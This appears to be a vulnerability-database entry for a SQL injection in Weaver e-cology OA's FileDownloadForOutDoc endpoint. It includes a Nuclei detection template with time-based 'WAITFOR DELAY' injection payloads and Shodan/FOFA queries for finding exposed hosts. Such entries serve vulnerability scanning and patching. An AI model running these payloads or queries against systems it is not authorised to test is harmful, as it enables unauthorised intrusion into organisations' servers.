ecology-oa-file-sqli: E-cology FileDownloadForOutDocSQL - SQL Injection

日期: 2025-08-01 | 影响软件: ecology-oa-file | POC: 已公开

漏洞描述

e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system

PoC代码[已公开]

id: ecology-oa-file-sqli

info:
  name: E-cology FileDownloadForOutDocSQL - SQL Injection
  author: momika233
  severity: high
  description: |
    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
  reference:
    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-cology
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  tags: time-based-sqli,ecology,ecology-oa,sqli,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}

        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
      - |
        @timeout: 35s
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}

        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=7 && status_code_1 == 200'
          - 'contains(header_1, "ecology_JSessionid=")'
          - 'duration_2>=15 && status_code_2 == 200'
          - 'contains(header_2, "ecology_JSessionid=")'
        condition: and
# digest: 4b0a00483046022100c7bc8e17ae559bc33c2fed09a76e9560e6ef058f62178714627bb748e314fbec022100e86b342db9470bbb8b7dce2b00528afa2625b5aade7532dc5bd7ebd704639a02:922c64590222798bb761d5b6d8e72950

相关漏洞推荐